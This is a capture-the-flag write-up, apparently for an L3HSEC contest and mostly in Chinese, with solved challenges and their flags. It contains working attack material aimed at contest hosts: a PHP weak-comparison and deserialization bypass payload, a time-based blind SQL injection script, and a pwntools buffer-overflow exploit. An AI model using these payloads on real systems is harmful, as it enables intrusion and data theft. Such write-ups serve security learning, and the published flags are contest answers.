web
phpplayer
Payload:/?a[]=1&b[]=2&c[]=3&d[1.01=4&fake_flag=flag&flag=1&obj=O:4:“test”:2:{s:1:“a”;s:3:“abc”;}
flag=1
1.弱类型比较漏洞 将a设置为一个数组 绕过第一个和第二个if
2.根据md5特性 数组无法比较md5值 将b c 都设置为数组可绕过md5验证
3.get post flag=flag 绕过这个一个if
4.需要让 d_1.01 变量存在才能绕过这个if 但是这个变量名不符合命名规则 在csdn上搜索到类似的情况
将d设置为包含子数组的参数 可以使条件成立 构造 d[1.01=1] 绕过这个if
5.反序列化漏洞 构造obj参数 修改属性数 绕过这个if
obj=O:4:“test”:2:{s:1:“a”;s:3:“abc”;}
6.将fake_flag 全局变量设置 为 flag 读取flag内容
<?php
/**
 * Minimal class used only to see what serialize() emits for one public
 * string property (the property count and the s:N: lengths in the output).
 */
class test
{
    public $a = '123';
}
// Print the canonical serialization of a fresh instance; the writeup then
// edits the property count by hand (see the line below the listing).
$obj = new test();
echo serialize($obj);
?>
# O:4:"test":1:{s:1:"a";s:3:"123";}
O:4:"test":2:{s:1:"a";s:3:"123";}
ilikesleep
import string
import httpx
import time
URL = "http://webt2.chall.ctf.l3hsec.com/index.php"
# Candidate character codes, tried in this order: "{", "}", "_", "," first,
# then every ASCII letter and digit.
alis = list(map(ord, string.ascii_letters + string.digits))
rlis = [123, 125, 95, 44, *alis]
def test(payload: str) -> bool:
    """Return True when the POST of ``payload`` (form field ``id``) hits httpx's ReadTimeout.

    Only a timeout counts as a positive; any other outcome, including an
    ordinary HTTP error response, is reported as False.
    """
    form = {"id": payload}
    timed_out = False
    try:
        httpx.post(URL, data=form)
    except httpx.ReadTimeout:
        timed_out = True
    return timed_out
def attack(column_length: int):
    """Reconstruct up to ``column_length`` characters, one position at a time.

    For each position every code in ``rlis`` is submitted through ``test``;
    the first one that makes the server stall is accepted and printed, then
    the loop pauses a second before moving on. Positions where no candidate
    stalls the server are simply skipped.

    Returns:
        The characters accepted so far, as a str.

    Defender's note: each accepted character costs dozens of near-identical,
    deliberately slow requests to one endpoint, so request-duration logging
    and a query timeout on the database side make this pattern stand out.
    """
    recovered = ""
    for position in range(column_length):
        for code in rlis:
            guess = chr(code)
            payload = f"1'\tunion\tselect\tnull,null,if(substr((select\tgroup_concat(flag)\tfrom\tflag),{position},1)='{guess}',benchmark(30000000,sha(1)),1)#"
            if not test(payload):
                continue
            recovered += guess
            print(recovered)
            time.sleep(1)
            break
    return recovered
# Entry point: 100 positions is an upper bound, the loop stops early only per position.
recovered = attack(100)
print(recovered)
misc
base64?
我的密文: ox6qJI1Q7kJY1OvuR/1CBs1yRVvuEIfeR/lCUMAGrV8LwEL=
泄露的明文: jRQfVJMwco5wegcVY3cAFi5a7V97IIWMgNh/epeit8Prp1+vdved0CzndIyCqfEMvho3YF33SYjeif4oi0mGscBFhRH70i17E8IgGAVXtZGDhSK9vPkH5MhI
泄露的密文: N+d9r+rjVElQoG1krPlQ1+MG8LvXNV1p658u6L+d1L5aVsFKrEA+NEUhB/dYRTfIr/r+rxAx7suMTE+xJPrvVErqoG6r9QRGB5+0rP+s6XSWRX5/JI6m9spTTxJYNVnk9VpdrLlA1+pLPMlnNv6zbErUNLF5VPpd
你现在知道我的明文了吗?
wp: 根据题意 密文长度是明文长度的1.5倍可推测出是base64加密
但是常规的base64解密无法得出答案
根据泄露的明文和密文可以推测出 原来的base64码表被替换
所以需要根据明文和密文破解出 替换后的码表
由于写脚本水平太差 TmT 我半手动半脚本破解了码表:) 过程如下
根据base64的特性 把明文的ASCII值转为8位二进制
然后用python分为六个一组 计算出相应的数值 然后与字符 对应就得到了码表
不过不完整
然后替换码表进行base64解密
由于码表还不全 我写脚本的能力太差 然后我4个一组 暴力猜测手动试出了可读的字符 得到了flag TmT…
import base64
import string
str1 = "ox6q JI1Q 7kJY 1Ovu R/1C Bs1y RVvu EIfe R/lC UMAG rV8L wEL="
# Partially recovered substitution alphabet, in table order; '2' marks slots
# still unknown (the duplicates collapse to one mapping in maketrans).
string1 = "yAmxnvX/wdjzR6b2U9TVB1PE8rNoJl7CFpOQM+saqW022feKY22GL5Ikhu222S22"
# Standard base64 alphabet in index order.
string2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
# Map the custom alphabet back onto the standard one, then decode normally;
# the spaces in str1 are not base64 characters and b64decode discards them.
table = str.maketrans(string1, string2)
print(base64.b64decode(str1.translate(table)))
把未知的码表替换为2 然后暴力破解出可读的字符
最终结果: b'l3hsec{w0W!y0u_Re@11y_kn0w_B@se64!}'
我属于是编程水平太差,人肉爆破的,这里po一下南小鸟师傅的脚本
def diybase64_encode(source, cipher):
    """Recover a custom base64 alphabet from a known plaintext/ciphertext pair.

    The plaintext is expanded to its 6-bit base64 group values; the i-th
    group value is the table slot occupied by the i-th ciphertext character.
    Slots that never occur in ``source`` are left as ' '.

    Args:
        source: plaintext (str) whose custom-base64 encoding is known.
        cipher: the matching custom-base64 text; one character is read per
            6-bit group of ``source``.

    Returns:
        A list of 64 one-character strings (' ' for unresolved slots).

    Raises:
        IndexError: if ``cipher`` has fewer characters than ``source`` has 6-bit groups.
    """
    table = [' '] * 64
    bits = ''.join(format(ord(ch), '08b') for ch in source)
    # Pad with two zero bits per missing byte of the final triple, as base64 does.
    bits += '00' * ((-len(source)) % 3)
    for index in range(len(bits) // 6):
        slot = int(bits[index * 6:index * 6 + 6], 2)
        table[slot] = cipher[index]
    return table
m = 'jRQfVJMwco5wegcVY3cAFi5a7V97IIWMgNh/epeit8Prp1+vdved0CzndIyCqfEMvho3YF33SYjeif4oi0mGscBFhRH70i17E8IgGAVXtZGDhSK9vPkH5MhI'
c = 'N+d9r+rjVElQoG1krPlQ1+MG8LvXNV1p658u6L+d1L5aVsFKrEA+NEUhB/dYRTfIr/r+rxAx7suMTE+xJPrvVErqoG6r9QRGB5+0rP+s6XSWRX5/JI6m9spTTxJYNVnk9VpdrLlA1+pLPMlnNv6zbErUNLF5VPpd'
# Build the 64-entry table from the leaked pair and add the padding character
# as entry 65. NOTE: the name `map` shadows the builtin; it is kept because the
# brute-force loop further down reads it.
map = diybase64_encode(m, c) + ['=']
print(map)
得到新的base64码表后,注意到表中缺少flag密文里的一些字符,于是对这些字符的位置进行爆破。
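import itertools  # used below; the listing did not import it

ci = 'ox6qJI1Q7kJY1OvuR/1CBs1yRVvuEIfeR/lCUMAGrV8LwEL='
# Characters of the target ciphertext that the leaked pair never covered.
# They were found with:
#     for i in ci:
#         if i not in map:
#             print(i)
lostChar = 'OCyew'
# Table slots still unassigned (' ') after diybase64_encode().
lostPart = [0, 8, 15, 31, 34, 43, 44, 46, 49, 50, 58, 59, 60, 62, 63]
# Try every assignment of the five missing characters to five distinct free
# slots and print any table that decodes to the expected flag shape.
# NOTE(review): `diybase64_decode` is not defined in this listing; it is expected
# to decode `ci` with the given 65-entry table and return a str.
for slots in itertools.permutations(lostPart, len(lostChar)):
    tmpMap = list(map)
    for slot, ch in zip(slots, lostChar):
        tmpMap[slot] = ch
    flag = diybase64_decode(ci, tmpMap)
    if 'kn0w_B@se64!}' in flag and 'l3hsec{w0W!y0u' in flag:
        print(flag)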
真的不用对脑洞
跨过这两道栅栏,培根转身看不到摩斯,只看到了一堆贝斯
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
利用basecrack脚本多次base解码后得到这个
-./-./---/-./-./---/-./-./---/-./-./---/---/-./---/-./---/-./-./-./-./---/-./-./---/-./-./-./---/-./-./---/---/---/-./-./-./-./---/-./---/---/-./-./-./---/-./-./-./---/-./-./-./---/-./---/---/-./-./-./-./---/-./---/---/-./---/---/---/---/-./-./-./-./-./---/-./-./---/---/---/-./-./---/-./-./---/---/---/-.
翻译莫斯电码
NNONNONNONNOONONONNNNONNONNNONNOOONNNNONOONNNONNNONNNONOONNNNONOONOOOONNNNNONNOOONNONNOOON
5个一组
AABAA BAABA ABBAB ABAAA ABAAB AAABA ABBBA AAABA BBAAA BAAAB AAABA BBAAA ABABB ABBBB AAAAA BAABB BAABA ABBBA
培根密码解码 E S N I J C O C Y R C Y L P A T S O E T O I K C P C S C M Q A U T P
根据跨过两道栅栏可以 将其分为两个一组
ES NI JC OC YR CY LP AT SO
每组先读取首字母得到 ENJOYCLASSICCRYPTO
chatsignin
奶奶的睡前flag故事
robot36
010editor打开,看到cover.png结尾有东西
查到wav文件头是RIFF,找到后删去前面的内容,另存为1.wav。然后用robot36处理。
re
pyencode
gpt秒了
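def restore_string(ret):
    """Unpack a list of small ints back into the text they encode.

    Each group of three values yields two characters:
    ``chr((ret[i] << 3) + (ret[i + 1] >> 3))`` and
    ``chr(((ret[i + 1] & 0b111) << 4) + ret[i + 2])``.

    Args:
        ret: sequence of ints whose length is a multiple of 3.

    Returns:
        The decoded text; "" for an empty input.

    Raises:
        ValueError: if ``len(ret)`` is not a multiple of 3.
    """
    if len(ret) % 3:
        raise ValueError(f"expected a multiple of 3 values, got {len(ret)}")
    chars = []
    for i in range(0, len(ret), 3):
        first, middle, last = ret[i:i + 3]
        # high bits of char 1 come from `first`, its low three bits from `middle`
        chars.append(chr((first << 3) + (middle >> 3)))
        # the remaining three bits of `middle` sit above the four bits of `last`
        chars.append(chr(((middle & 0b111) << 4) + last))
    return "".join(chars)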
# Encoded flag as produced by the challenge; 66 values = 22 groups of three.
ret = [13, 35, 3, 13, 7, 3, 12, 46, 3, 15, 30, 1, 6, 19, 9, 6, 62, 6, 7, 3, 6, 12, 34, 13, 12, 51, 1, 12, 11, 6, 5, 43, 4, 12, 11, 3, 6, 50, 13, 7, 14, 6, 6, 6, 6, 5, 43, 3, 6, 43, 8, 6, 59, 3, 12, 35, 3, 12, 11, 1, 6, 46, 6, 6, 15, 13]
print(restore_string(ret))
pwn
ret2text
from pwn import *
context(log_level='debug', arch='amd64', os='linux')
p = remote('ctf.l3hsec.com', 40008)
read_flag = 0x4007D8
ret = 0x40089d  # alignment (translated from the original note)
# 0x18 bytes of filler, then the two return addresses.
padding = b'1' * 0x18
payload = padding + p64(ret) + p64(read_flag)
p.recv()
p.sendline(payload)
p.recv()
p.recv()
CRYPTO
factor
from Crypto.Util.number import *
p = 11818626157955143367425397134539988701945901292912494601671841920448950142432716617641692683670072692623351876503702080986305564988430515942372445616530643
n = 155973472877500551696404049342507495077134952416313340244284845928778400385389548636037403472336378336490931666382159990607516752340206514340009510417187026921007116552045963973163720919596636575029141772459275706505175142195195686881713118383919643653234410908740422880120161538592336383479253864155940629093
q = n // p
assert p * q == n  # p must be an exact factor of n
e = 0x10001
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)  # modular inverse of e mod phi(n), same value as Crypto's inverse()
c = 32349988441710439726991823014652327949110727303493414402820119679942533399117470462729126720315109509283386087378965374529410971247867614623318967344071216979994926505735379297102144644819487720051553195643392945426400493308569024431403247836671630208580022421678378308476007451938426212992790979191141986943
m = pow(c, d, n)
# big-endian bytes of m, same as long_to_bytes() for a non-zero value
print(m.to_bytes((m.bit_length() + 7) // 8, 'big'))